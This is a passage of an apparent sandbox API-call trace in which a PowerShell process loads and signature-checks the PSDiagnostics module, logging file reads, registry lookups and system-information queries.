lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0153.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e460) returned 1 [0153.853] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x520 [0153.854] GetFileType (hFile=0x520) returned 0x1 [0153.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e45c) returned 1 [0153.854] GetFileType (hFile=0x520) returned 0x1 [0153.854] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x0 [0153.854] ReadFile (in: hFile=0x520, lpBuffer=0x27b49a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x27b49a4*, lpNumberOfBytesRead=0x5a0e4c8*=0x266, lpOverlapped=0x0) returned 1 [0153.965] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x266 [0153.965] ReadFile (in: hFile=0x520, lpBuffer=0x27b49a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x27b49a4*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0153.965] CloseHandle (hObject=0x520) returned 1 [0153.966] CoCreateGuid (in: pguid=0x5a0e508 | out: pguid=0x5a0e508*(Data1=0x933c1c7d, Data2=0xcc2f, Data3=0x4ebd, Data4=([0]=0xa3, [1]=0x85, [2]=0x66, [3]=0x3b, [4]=0xc3, [5]=0xcb, [6]=0x65, [7]=0xb4))) returned 0x0 [0153.966] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x520 [0153.966] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x53c [0153.966] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320 [0153.967] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x52c [0153.967] SetEvent (hEvent=0x52c) returned 1 [0153.967] SetEvent (hEvent=0x520) returned 1 [0153.967] SetEvent (hEvent=0x53c) returned 1 [0153.967] SetEvent (hEvent=0x320) returned 1 [0153.967] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x544 [0153.967] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.968] EtwEventActivityIdControl () returned 0x0 [0153.968] EtwEventActivityIdControl () returned 0x0 [0153.968] EtwEventActivityIdControl () returned 0x0 [0153.973] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1")) returned 0x20 [0153.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0153.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0153.974] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0de40, Length=0x20, ResultLength=0x5a0deb0 | out: SystemInformation=0x5a0de40, ResultLength=0x5a0deb0*=0x0) returned 0xc0000003 [0153.974] GetSystemInfo (in: lpSystemInfo=0x5a0debc | out: lpSystemInfo=0x5a0debc*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0153.975] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0de4c | out: phkResult=0x5a0de4c*=0x54c) returned 0x0 [0153.975] RegQueryValueExW (in: hKey=0x54c, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0de68, lpData=0x0, lpcbData=0x5a0de64*=0x0 | out: lpType=0x5a0de68*=0x0, lpData=0x0, lpcbData=0x5a0de64*=0x0) returned 0x2 [0153.975] RegCloseKey (hKey=0x54c) returned 0x0 [0153.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0153.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0153.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ddc4) returned 1 [0153.975] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x54c [0153.976] GetFileType (hFile=0x54c) returned 0x1 [0153.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ddc0) returned 1 [0153.976] GetFileType (hFile=0x54c) returned 0x1 [0153.976] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0de00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0de00*=0) returned 0x0 [0153.976] ReadFile (in: hFile=0x54c, lpBuffer=0x27c1934, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0de2c, lpOverlapped=0x0 | out: lpBuffer=0x27c1934*, lpNumberOfBytesRead=0x5a0de2c*=0x266, lpOverlapped=0x0) returned 1 [0153.976] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0de00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0de00*=0) returned 0x266 [0153.976] ReadFile (in: hFile=0x54c, lpBuffer=0x27c1934, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0de2c, lpOverlapped=0x0 | out: lpBuffer=0x27c1934*, lpNumberOfBytesRead=0x5a0de2c*=0x0, lpOverlapped=0x0) returned 1 [0153.977] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0dd94, Length=0x20, ResultLength=0x5a0de04 | out: SystemInformation=0x5a0dd94, ResultLength=0x5a0de04*=0x0) returned 0xc0000003 [0153.977] GetSystemInfo (in: lpSystemInfo=0x5a0de10 | out: lpSystemInfo=0x5a0de10*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0153.977] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0dda0 | out: phkResult=0x5a0dda0*=0x550) returned 0x0 [0153.977] RegQueryValueExW (in: hKey=0x550, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0ddbc, lpData=0x0, lpcbData=0x5a0ddb8*=0x0 | out: lpType=0x5a0ddbc*=0x0, lpData=0x0, lpcbData=0x5a0ddb8*=0x0) returned 0x2 [0153.977] RegCloseKey (hKey=0x550) returned 0x0 [0153.977] CloseHandle (hObject=0x54c) returned 1 [0153.978] CoCreateGuid (in: pguid=0x5a0de90 | out: pguid=0x5a0de90*(Data1=0x58048759, Data2=0x2a17, Data3=0x42ef, Data4=([0]=0xab, [1]=0x64, [2]=0x23, [3]=0x82, [4]=0x22, [5]=0xf3, [6]=0x21, [7]=0xc))) returned 0x0 [0153.978] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0dbf0 | out: lpPerformanceCount=0x5a0dbf0*=2943878858569) returned 1 [0153.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0153.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0153.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d8dc) returned 1 [0153.978] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0dba0 | out: lpFileInformation=0x5a0dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100bf6e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c28927f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c28927f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x266)) returned 1 [0153.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d8d8) returned 1 [0153.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0153.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0153.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0153.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0153.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d870) returned 1 [0153.979] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0db34 | out: lpFileInformation=0x5a0db34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100bf6e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c28927f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c28927f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x266)) returned 1 [0153.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d86c) returned 1 [0153.979] CoTaskMemAlloc (cb=0x10) returned 0x5c0a150 [0153.979] CoTaskMemAlloc (cb=0x10) returned 0x5c0a120 [0153.979] CoTaskMemAlloc (cb=0xa8) returned 0x5c05370 [0153.979] CoTaskMemAlloc (cb=0x30) returned 0x6a8620 [0153.979] WinVerifyTrust () returned 0x800b0100 [0154.108] CoTaskMemFree (pv=0x5c0a150) [0154.108] CoTaskMemFree (pv=0x6a8620) [0154.108] CryptCATHandleFromStore () returned 0x65bb68 [0154.108] WTHelperGetProvSignerFromChain () returned 0x0 [0154.108] CoTaskMemAlloc (cb=0x10) returned 0x5c0a150 [0154.108] CoTaskMemAlloc (cb=0x30) returned 0x6a8620 [0154.108] WinVerifyTrust () returned 0x0 [0154.109] CoTaskMemFree (pv=0x6a8620) [0154.109] CoTaskMemFree (pv=0x5c0a150) [0154.109] CoTaskMemFree (pv=0x5c05370) [0154.109] CoTaskMemFree (pv=0x5c0a120) [0154.114] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\en-US\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\en-us\\psdiagnostics.psd1")) returned 0xffffffff [0154.114] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\en\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\en\\psdiagnostics.psd1")) returned 0xffffffff [0154.117] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.124] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.132] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.140] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.146] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.153] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.160] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.167] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.173] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.181] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.187] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.194] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.203] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.215] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0154.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0154.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0154.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x41, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40 [0154.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0154.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSGetModuleInfo.xml", nBufferLength=0x55, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x54 [0154.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d32c) returned 1 [0154.225] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x5a0d5f0 | out: lpFileInformation=0x5a0d5f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.226] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d328) returned 1 [0154.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0154.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics", nBufferLength=0x4f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics", lpFilePart=0x0) returned 0x4e [0154.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d22c) returned 1 [0154.226] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics"), fInfoLevelId=0x0, lpFileInformation=0x5a0d4f0 | out: lpFileInformation=0x5a0d4f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.226] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d228) returned 1 [0154.230] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1")) returned 0x20 [0154.230] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1")) returned 0x20 [0154.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0154.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0154.230] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0d0b0, Length=0x20, ResultLength=0x5a0d120 | out: SystemInformation=0x5a0d0b0, ResultLength=0x5a0d120*=0x0) returned 0xc0000003 [0154.231] GetSystemInfo (in: lpSystemInfo=0x5a0d12c | out: lpSystemInfo=0x5a0d12c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0154.231] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0d0bc | out: phkResult=0x5a0d0bc*=0x550) returned 0x0 [0154.231] RegQueryValueExW (in: hKey=0x550, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0d0d8, lpData=0x0, lpcbData=0x5a0d0d4*=0x0 | out: lpType=0x5a0d0d8*=0x0, lpData=0x0, lpcbData=0x5a0d0d4*=0x0) returned 0x2 [0154.231] RegCloseKey (hKey=0x550) returned 0x0 [0154.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0154.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0154.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d034) returned 1 [0154.232] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x550 [0154.232] GetFileType (hFile=0x550) returned 0x1 [0154.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d030) returned 1 [0154.232] GetFileType (hFile=0x550) returned 0x1 [0154.233] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d070*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d070*=0) returned 0x0 [0154.233] ReadFile (in: hFile=0x550, lpBuffer=0x282432c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d09c, lpOverlapped=0x0 | out: lpBuffer=0x282432c*, lpNumberOfBytesRead=0x5a0d09c*=0x266, lpOverlapped=0x0) returned 1 [0154.233] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d070*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d070*=0) returned 0x266 [0154.233] ReadFile (in: hFile=0x550, lpBuffer=0x282432c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d09c, lpOverlapped=0x0 | out: lpBuffer=0x282432c*, lpNumberOfBytesRead=0x5a0d09c*=0x0, lpOverlapped=0x0) returned 1 [0154.233] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0d004, Length=0x20, ResultLength=0x5a0d074 | out: SystemInformation=0x5a0d004, ResultLength=0x5a0d074*=0x0) returned 0xc0000003 [0154.234] GetSystemInfo (in: lpSystemInfo=0x5a0d080 | out: lpSystemInfo=0x5a0d080*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, 